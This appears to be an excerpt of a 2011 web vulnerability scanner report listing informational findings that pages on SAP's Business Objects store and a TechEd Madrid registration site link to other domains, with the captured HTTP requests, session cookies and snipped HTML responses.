Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000; extcmp=null; fcOOS=fcOptOutChip=undefined; fcP=C=0&T=1318689061488&DTO=1318689060945&U=2033968180&V=1318689060945; fcR=http%3A//www.sap.com/index.epx; mbox=check#true#1318689123|session#1318689062767-959486#1318690923|PC#1318689062767-959486.19#1319898665; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; s_pers=%20v36%3D%255B%255B%2527CG4DA4BC51%2527%252C%25271318689062905%2527%255D%255D%7C1476541862905%3B%20s_ttc%3D1318688493%7C1350225062924%3B%20c13%3Destores%253Aus%253Ahomepage%7C1318690868667%3B%20pe%3Dno%2520value%7C1318690868669%3B%20c3%3Dno%2520value%7C1318690868671%3B%20s_nr%3D1318689068677-New%7C1321281068677%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292668680%3B%20s_visit%3D1%7C1318690868682%3B%20gpv_p47%3D1%7C1318690868684%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D1%3B%20v13%3DCG4DA4BC51%3B%20s_sq%3Dsapglobal%252Csapsuite1%252Csapvbuus%253D%252526pid%25253Destores%2525253Aus%2525253Ahomepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//store.businessobjects.com/DRHM/store%2525253FAction%2525253DDisplayProductDetailsPage%25252526SiteID%2525253Dbobjamer%25252526Locale%2525253D%252526ot%25253DA%3B; fcPT=http%3A//store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800%3F_s_icmp%3DCG4DA4BC51%26resid%3DTmOIUAoBAlUAAARDMJwAAAAN%26rests%3D1318689037443; fcC=X=C2033968180&Y=1318689061488&FV=10&H=1318689060945&fcTHR=store.businessobjects.com}www.businessobjects.com&Z=0&E=1135861&F=0&I=1318689068696

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=66142365618,0)
Date: Sat, 15 Oct 2011 14:30:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 105548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="google-site-verification" content="gJV9O7xZkWZNE3ptcvkI73WjeHfPuQctxju7NThpi8Y" />


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/multimedia/js/estore_mtagconfig.js"></script>


<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/css/sap_fancybox_2.css" media="screen" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=65f38917&Env=BASE&Locale=en_US&SiteID=bobjamer&StyleID=39233700&StyleVersion=7&_s_icmp=CG4E7A594&categoryID=57066300&ceid=17651930
...[SNIP]...
<a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/close_en_US.gif" alt="Close Window" border="0"/></a>
...[SNIP]...
<li class="sapcom"><a href="http://www.sap.com/" title="SAP.com" onClick="TrackLink('http://www.sap.com/index.epx','SAP Profile','ClickArea=header')">SAP.com</a>
...[SNIP]...
<li><a title="E-Mail SAP" target="_blank" href="http://www.sap.com/contactsap/index.epx">Contact Us</a>
...[SNIP]...
</a> <img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span>
...[SNIP]...
</span><img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>


<span class="last">
...[SNIP]...
<a href="#" onClick="javascript:window.print()" class="print"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/print_icon.gif" alt="Printer Friendly" /></a>
...[SNIP]...
<a href="javascript:openEmailThisPageForm();" class="email lbOn"><img src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/layout/emailIcon_r2_c2.jpg" alt="Email page" /></a>
...[SNIP]...
<div id="dr_thumbnailImage">
<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Company/bobjamer/images/product/detail/screenshots/SAP_Crystal_Reports_Server160x160.jpg" border="0" alt="Buy SAP Crystal Server full product, 5 concurrent access licenses" />
</div>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style ">
<a class="dr_ShareLink" href="http://www.addthis.com/bookmark.php?v=250&amp;pubid=ra-4e3f99bf74164a4e" onClick="return false;" onMouseOver="return addthis_open(this, '', '[URL]', '[TITLE]');" onMouseOut="addthis_close();">Share</a>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js?pubid=ra-4e3f99bf74164a4e"></script>
...[SNIP]...
<li class="dr_Like"><iframe src="http://www.facebook.com/plugins/like.php?href=http:%2F%2Fstore.businessobjects.com%2Fstore%2Fbobjamer%2Fpd%2Flocale.en_US%2Fceid.173834100%2FStyleVersion.7%2Fcename.ProductDetails%2FcategoryID.57066300%2F_s_icmp.CG4E7A594%2FparentCategoryID.57065700%2FproductID.231860300%2FEnv.BASE%2FStyleID.39233700%2FESIHC.65f38917%2FCurrency.USD&amp;layout=button_count&amp;show_faces=false&amp;width=150&amp;action=recommend&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;"></iframe>
...[SNIP]...
<div id="dr_details_column2_content" class="dr_content"> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7"><img style="border: 0px solid; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=15B9FCCD69FD9723BE976F83C4B513C31103032CF1E37F4D27F65F19AA9A146AA82E4A3BF15CEB408ED6B8782F4ED4A873E225112B4BF0A7 " title=" ">CRS Explore, Manage, and Share Critical Business Information</a>
...[SNIP]...
<br /> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E "><img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/SMIGlobal/download.epd?context=91310F89770D3E5416B7F37F83265EDE767BC5819FA2DC6879D7984D333596FA36E1608C1DA75626CBF8A000477371D0E859397A5BD55B6E " title=" ">Comparison of Features by Version</a>
...[SNIP]...
<a href="http://www.businessobjects.com/jump/xi/dev_roundup/forrester.pdf" target="_blank"> <img style="border: 0px solid ; width: 16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a>
...[SNIP]...
<br /> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794 "><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=F8EF9E7F2800655B92E80B4A14DCED568467C61C91ED76ADCB9EEAA1918BDECFA598A46175110A9DE96F0944E9F5E37DEB4F9B9BF30CC794" title=" ">SAP Crystal Solutions What...s New in 2011</a><br /> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D"><img style="border: 0px solid ; width:16px; height: 16px;" alt="PDF" src="http://drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/images/pdf.gif"></a> <a href="http://download.sap.com/download.epd?context=479E3328706EC0FF4F6E831D57E79E5D41006BFF1C49496F89747ECA2E653CDEDBFC67042E8B1AB7E87F114724712CCAB01703315252E29D" title=" ">SAP Crystal Solutions 2011 FAQ</a>
...[SNIP]...
<p>Visit our <a href="http://www.sap.com/solutions/sapbusinessobjects/sap-crystal-solutions/information-infrastructure/sapcrystalserver/licensing/index.epx" target="_blank">SAP Crystal Reports Server licensing terms</a>
...[SNIP]...
<p class="right-rail-link"><a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore" target="_new">Get a Trial ...</a>
...[SNIP]...
<p class="right-rail-link"><a href="http://www.sap.com/partners/partnerwithsap/business-objects-crystal/north-american-resellers.epx?xsite=CG4D9F644F" target="_blank">Find a Reseller ...</a>
...[SNIP]...
<li><a href="http://www.crystalreports.com" target="_target" >SAP Crystal solutions</a>
...[SNIP]...
<li><a href="http://www.sap.com/usa/services/education/index.epx" target="_target" >SAP Training</a>
...[SNIP]...
<li><a href="http://www.sap.com/contactsap/directory/index.epx" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','SAP Offices','ClickArea=footer')">SAP Offices</a>
...[SNIP]...
<li><a href="http://www.sap.com/communities/index.epx" id="footerlink-communities" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Communities','ClickArea=footer')">Communities</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target="_blank">Privacy</a>
...[SNIP]...
<li class="long"><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<div id="footer-right">
<a href="http://www.sap.com/social/index.epx" id="social-network" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Follow SAP','ClickArea=footer')">Follow SAP</a>
...[SNIP]...
<!-- ROI Engine Tracking Code v4.00 - All rights reserved -->
                       <script type="text/javascript" src="https://www.sap.com/global/js/roiengine.js"></script>
                       <noscript><img src="https://roiengine.sap.com/p.pl?a=10002109824374&js=no" width="1" height="1"></noscript>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
<noscript>
           <a href="https://www.omniture.com" title="Web Analytics"><img
src="https://sap.112.2o7.net/b/ss/sapglobal,sapsuite1,sapvbuus/1/H.21--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
17.12. http://store.businessobjects.com/store/bobjamer/DisplayHomePage/pgm.+77298800  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.businessobjects.com
Path:   /store/bobjamer/DisplayHomePage/pgm.+77298800

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /store/bobjamer/DisplayHomePage/pgm.+77298800?_s_icmp=CG4DA4BC51&resid=TmOIUAoBAlUAAARDMJwAAAAN&rests=1318689037443 HTTP/1.1
Host: store.businessobjects.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.1.2.194:260-0#0"; JSESSIONID=0A6E08D05288243D3676FD314938750B; VISITOR_ID=971D4E8DFAED43679E246899D1DA9F034AAC40FA94AD0B51; bobjamer.pgm=" 77298800"; BIGipServerp-drh-dc1pod5-pool1-active=3254911242.260.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=117681963088,0)
Date: Sat, 15 Oct 2011 14:30:40 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc1app50
Content-Length: 152118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<meta name="crystal solutions, crystal reports, sap online store, business objects" />

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/global.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/pb/multimedia/js/estore_mtagconfig.js"></script>

<link rel="icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/images/favicon.ico" type="image/x-icon" />

<link rel="stylesheet" type="text/css" href="/DRHM/Storefront/Site/bobjamer/cm/multimedia/Redesign_2011/css/sap_fancybox_2.css" media="screen" />
...[SNIP]...
<!--!/esi:include -->
<link rel="stylesheet" href="http://drh.img.digitalriver.com/store?Action=DisplayContentManagerStyleSheet&SiteID=bobjamer&StyleID=39199500&StyleVersion=3&styleIncludeFile=style.css" type="text/css" media="all" />
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=65f38917&Env=BASE&Locale=en_US&SiteID=bobjamer&StyleID=39199500&StyleVersion=3&_s_icmp=CG4DA4BC51&ceid=176519300&cename=TopHeader&
...[SNIP]...
<a href="#" class="popup_close_button_link" title="Close Window"><img class="popup_close_button" src="//drh2.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/close_en_US.gif" alt="Close Window" border="0"/></a>
...[SNIP]...
<li class="sapcom"><a href="http://www.sap.com/" title="SAP.com" onClick="TrackLink('http://www.sap.com/index.epx','SAP Profile','ClickArea=header')">SAP.com</a>
...[SNIP]...
<li><a title="E-Mail SAP" target="_blank" href="http://www.sap.com/contactsap/index.epx">Contact Us</a>
...[SNIP]...
</span> <img class="bc_img" src="//drh1.img.digitalriver.com/DRHM/Storefront/SiteImplementation/bobjamer/bobjamerSI/version/86/images/bc_arrow_en_US.gif"/>



...[SNIP]...
<div id="hero-promo">


                   <a href="http://sap-web.com/estore/cfg/"><img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/RightHand_Banners/solutions-config.jpg" border="0"/></a>
...[SNIP]...
roductID=228867500&parentCategoryID=57065700&categoryID=57066100&_s_icmp=CG4DBEF14">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_crystal_reports.jpg" border="0" alt="SAP Crystal Reports"></a>
...[SNIP]...
productID=97983100&parentCategoryID=57065700&categoryID=57103400&_s_icmp=CG4CCB4CE">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_crystal_reports_xi.jpg" border="0" alt="Crystal Reports XI Developer Full Product"></a>
...[SNIP]...
roductID=228875300&parentCategoryID=57065700&categoryID=57065800&_s_icmp=CG4DBEF24">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_de.jpg" border="0" alt="SAP Crystal Dashboard Design, departmental edition"></a>
...[SNIP]...
roductID=100424700&parentCategoryID=57065700&categoryID=57065800&_s_icmp=CG4CCB4CA">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_pe.jpg" border="0" alt="SAP Crystal Dashboard Design 2008, personal edition, full product"></a>
...[SNIP]...
roductID=104506000&parentCategoryID=57065700&categoryID=57065800&_s_icmp=CG4E71247">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_08.jpg" border="0" alt="SAP Crystal Reports Dashboard Design 2008 package, full product"></a>
...[SNIP]...
roductID=228883100&parentCategoryID=57065700&categoryID=57066000&_s_icmp=CG4E71249">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_pe.jpg" border="0" alt="SAP Crystal Presentation Design"></a>
...[SNIP]...
roductID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/th_sap_crystal_server_5cal.jpg" border="0" alt="SAP Crystal Server full product, 5 concurrent access licenses"></a>
...[SNIP]...
roductID=231858000&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A598">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_server_5nul.jpg" border="0" alt="SAP Crystal Server Full Product, 5 named user licenses"></a>
...[SNIP]...
roductID=228867500&parentCategoryID=57065700&categoryID=57066100&_s_icmp=CG4DBEF14">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_crystal_reports.jpg" border="0" alt="SAP Crystal Reports"></a>
...[SNIP]...
productID=97983100&parentCategoryID=57065700&categoryID=57103400&_s_icmp=CG4CCB4CE">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_crystal_reports.jpg" border="0" alt="Crystal Reports XI Developer Full Product"></a>
...[SNIP]...
<a href="/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=110949700">

<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_cr_runtime.jpg" border="0" alt="SAP Crystal Reports, runtime server license"></a>
...[SNIP]...
roductID=104506000&parentCategoryID=57065700&categoryID=57065800&_s_icmp=CG4E71247">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_08.jpg" border="0" alt="SAP Crystal Reports Dashboard Design 2008 package, full product"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=100546100&parentCategoryID=57065700&categoryID=57103400">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_reports_08.jpg" border="0" alt="SAP Crystal Reports 2008, full product"></a>
...[SNIP]...
roductID=231858000&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A598">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_server_5nul.jpg" border="0" alt="SAP Crystal Server Full Product, 5 named user licenses"></a>
...[SNIP]...
roductID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_server_5cal.jpg" border="0" alt="SAP Crystal Server full product, 5 concurrent access licenses"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=231860500&parentCategoryID=57065700&categoryID=57066300">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crs_full_10cal.jpg" border="0" alt="SAP Crystal Server full product, 10 concurrent access licenses"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=231860700&parentCategoryID=57065700&categoryID=57066300">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crs_full_20cal.jpg" border="0" alt="SAP Crystal Server full product, 20 concurrent access licenses"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=105954100&parentCategoryID=57065700&categoryID=57103400">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crs08_full_5nul.jpg" border="0" alt="SAP Crystal Reports Server 2008, full product, 5 named user licenses"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=105953300&parentCategoryID=57065700&categoryID=57103400">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crs08_full_5cal.jpg" border="0" alt="SAP Crystal Reports Server 2008, full product, 5 concurrent access licenses"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=199740200&parentCategoryID=57065700&categoryID=57103400">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crs08_full_10cal.jpg" border="0" alt="SAP Crystal Reports Server 2008, full product, 10 concurrent access licenses"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=199816700&parentCategoryID=57065700&categoryID=57103400">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crs08_full_20cal.jpg" border="0" alt="SAP Crystal Reports Server 2008, full product, 20 concurrent access licenses"></a>
...[SNIP]...
roductID=228875300&parentCategoryID=57065700&categoryID=57065800&_s_icmp=CG4DBEF24">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_de.jpg" border="0" alt="SAP Crystal Dashboard Design, departmental edition"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=228981200&parentCategoryID=57065700&categoryID=57065800">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_cdd_srtr_10nul.jpg" border="0" alt="SAP Crystal Dashboard Design, starter package, 10 named user licenses"></a>
...[SNIP]...
roductID=100424700&parentCategoryID=57065700&categoryID=57065800&_s_icmp=CG4CCB4CA">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_08.jpg" border="0" alt="SAP Crystal Dashboard Design 2008, personal edition, full product"></a>
...[SNIP]...
roductID=104506000&parentCategoryID=57065700&categoryID=57065800&_s_icmp=CG4E71247">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_08.jpg" border="0" alt="SAP Crystal Reports Dashboard Design 2008 package, full product"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=211323100&parentCategoryID=57065700&categoryID=57103400">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_cdd_dept08.jpg" border="0" alt="SAP Crystal Dashboard Design 2008, departmental edition, full product"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=188431400&parentCategoryID=57065700&categoryID=57103400">


<img src="//drh2.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_cdd_dept08_srtr_10nul.jpg" border="0" alt="SAP Crystal Dashboard Design 2008, starter package, full product, 10 named user licenses"></a>
...[SNIP]...
roductID=228883100&parentCategoryID=57065700&categoryID=57066000&_s_icmp=CG4E71249">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_pe.jpg" border="0" alt="SAP Crystal Presentation Design"></a>
...[SNIP]...
e=en_US&Env=BASE&productID=105571400&parentCategoryID=57065700&categoryID=57103400">


<img src="//drh1.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/images/promo/Homepage_ProductThumbs/th_sap_crystal_dd_pe.jpg" border="0" alt="SAP Crystal Presentation Design 2008, full product"></a>
...[SNIP]...
<li><a href="http://www.crystalreports.com" target="_target" >SAP Crystal solutions</a>
...[SNIP]...
<li><a href="http://www.sap.com/usa/services/education/index.epx" target="_target" >SAP Training</a>
...[SNIP]...
<li><a href="http://www.sap.com/contactsap/directory/index.epx" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','SAP Offices','ClickArea=footer')">SAP Offices</a>
...[SNIP]...
<li><a href="http://www.sap.com/communities/index.epx" id="footerlink-communities" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Communities','ClickArea=footer')">Communities</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/privacy.epx" target="_blank">Privacy</a>
...[SNIP]...
<li class="long"><a href="http://www.sap.com/corporate-en/our-company/legal/impressum.epx" target="_blank">Legal Disclosure</a>
...[SNIP]...
<li><a href="http://www.sap.com/corporate-en/our-company/legal/copyright/index.epx" target="_blank">Copyright</a>
...[SNIP]...
<div id="footer-right">
<a href="http://www.sap.com/social/index.epx" id="social-network" target="_blank" onClick="TrackLink('http://www.sap.com/index.epx','Follow SAP','ClickArea=footer')">Follow SAP</a>
...[SNIP]...
<NOSCRIPT>
<IFRAME SRC="https://fls.doubleclick.net/activityi;src=1672981;type=ameri516;cat=ussap197;ord=1?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
...[SNIP]...
<!-- ROI Engine Tracking Code v4.00 - All rights reserved -->
                       <script type="text/javascript" src="https://www.sap.com/global/js/roiengine.js"></script>
                       <noscript><img src="https://roiengine.sap.com/p.pl?a=10002109824374&js=no" width="1" height="1"></noscript>
...[SNIP]...
</script>

<script type="text/javascript" src="//www.sap.com/omni.epx"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjamer/cm/multimedia/js/tracking/omniture/05162011/s_code.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/bobjects/cm/multimedia/js/tracking/omniture/mbox.js"></script>
...[SNIP]...
<noscript>
           <a href="https://www.omniture.com" title="Web Analytics"><img
src="https://sap.112.2o7.net/b/ss/sapglobal,sapsuite1,sapvbuus/1/H.21--NS/0"
height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
17.13. https://teched2011madrid.sapevents.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://teched2011madrid.sapevents.com
Path:   /index.cfm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /index.cfm?fuseaction=reg.ReturnLogin HTTP/1.1
Host: teched2011madrid.sapevents.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapteched.com/emea/reghotel/home.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=960984; CFTOKEN=1dbb10d8150e3e49-07F5CDB4-EF18-FB99-51600E3F9C688CBD; SAP_TECHED2011MADRID=CFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D%5FCFE16675750B02%7C0%7C%7Bts%20%272011%2D10%2D15%2007%3A21%3A49%27%7D

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sat, 15 Oct 2011 14:29:27 GMT
Content-Length: 31925


